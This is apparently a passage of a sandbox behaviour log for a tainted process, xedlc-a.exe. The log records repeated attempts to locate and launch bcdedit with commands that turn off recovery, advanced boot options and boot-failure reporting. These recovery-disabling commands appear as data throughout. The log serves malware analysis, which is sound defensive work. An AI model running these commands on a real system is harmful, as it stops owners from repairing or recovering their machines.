- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51332
- mode: failed
- sequenceNumber: 317
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51339
- mode: failed
- sequenceNumber: 318
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51345
- mode: failed
- sequenceNumber: 319
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 51349
- sequenceNumber: 320
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: dummy.dll
- apiname: ProcessCreate_Failure
- address: 0x7c81d627
- params:
- param (id:1): NULL
- param (id:2): bcdedit.exe /set {current} advancedoptions off
- param (id:3): 32
- param (id:4): NULL
- apicall:
- timestamp: 51354
- sequenceNumber: 321
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- file:
- timestamp: 52365
- mode: failed
- sequenceNumber: 322
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52371
- mode: failed
- sequenceNumber: 323
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52377
- mode: failed
- sequenceNumber: 324
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52383
- mode: failed
- sequenceNumber: 325
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52388
- mode: failed
- sequenceNumber: 326
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52394
- mode: failed
- sequenceNumber: 327
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52399
- mode: failed
- sequenceNumber: 328
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52405
- mode: failed
- sequenceNumber: 329
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52411
- mode: failed
- sequenceNumber: 330
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52417
- mode: failed
- sequenceNumber: 331
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52423
- mode: failed
- sequenceNumber: 332
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit off.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52428
- mode: failed
- sequenceNumber: 333
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52433
- mode: failed
- sequenceNumber: 334
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52439
- mode: failed
- sequenceNumber: 335
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52446
- mode: failed
- sequenceNumber: 336
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52453
- mode: failed
- sequenceNumber: 337
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52460
- mode: failed
- sequenceNumber: 338
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 52467
- mode: failed
- sequenceNumber: 339
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 52459
- sequenceNumber: 340
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: dummy.dll
- apiname: ProcessCreate_Failure
- address: 0x7c81d627
- params:
- param (id:1): NULL
- param (id:2): bcdedit.exe /set {current} optionsedit off
- param (id:3): 32
- param (id:4): NULL
- apicall:
- timestamp: 52459
- sequenceNumber: 341
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- file:
- timestamp: 53474
- mode: failed
- sequenceNumber: 342
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53481
- mode: failed
- sequenceNumber: 343
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53487
- mode: failed
- sequenceNumber: 344
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53492
- mode: failed
- sequenceNumber: 345
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53497
- mode: failed
- sequenceNumber: 346
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53504
- mode: failed
- sequenceNumber: 347
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53509
- mode: failed
- sequenceNumber: 348
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53516
- mode: failed
- sequenceNumber: 349
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53522
- mode: failed
- sequenceNumber: 350
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53528
- mode: failed
- sequenceNumber: 351
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53534
- mode: failed
- sequenceNumber: 352
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy IgnoreAllFailures.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53540
- mode: failed
- sequenceNumber: 353
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53545
- mode: failed
- sequenceNumber: 354
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53551
- mode: failed
- sequenceNumber: 355
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53560
- mode: failed
- sequenceNumber: 356
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53566
- mode: failed
- sequenceNumber: 357
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53572
- mode: failed
- sequenceNumber: 358
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 53579
- mode: failed
- sequenceNumber: 359
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 53583
- sequenceNumber: 360
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: dummy.dll
- apiname: ProcessCreate_Failure
- address: 0x7c81d627
- params:
- param (id:1): NULL
- param (id:2): bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
- param (id:3): 32
- param (id:4): NULL
- apicall:
- timestamp: 53588
- sequenceNumber: 361
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- file:
- timestamp: 54613
- mode: failed
- sequenceNumber: 362
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54619
- mode: failed
- sequenceNumber: 363
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54625
- mode: failed
- sequenceNumber: 364
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54631
- mode: failed
- sequenceNumber: 365
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54636
- mode: failed
- sequenceNumber: 366
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54647
- mode: failed
- sequenceNumber: 367
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54652
- mode: failed
- sequenceNumber: 368
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54657
- mode: failed
- sequenceNumber: 369
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54662
- mode: failed
- sequenceNumber: 370
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54667
- mode: failed
- sequenceNumber: 371
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54672
- mode: failed
- sequenceNumber: 372
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled off.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54685
- mode: failed
- sequenceNumber: 373
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54690
- mode: failed
- sequenceNumber: 374
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54695
- mode: failed
- sequenceNumber: 375
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54699
- mode: failed
- sequenceNumber: 376
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 54704
- mode: failed
- sequenceNumber: 377
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
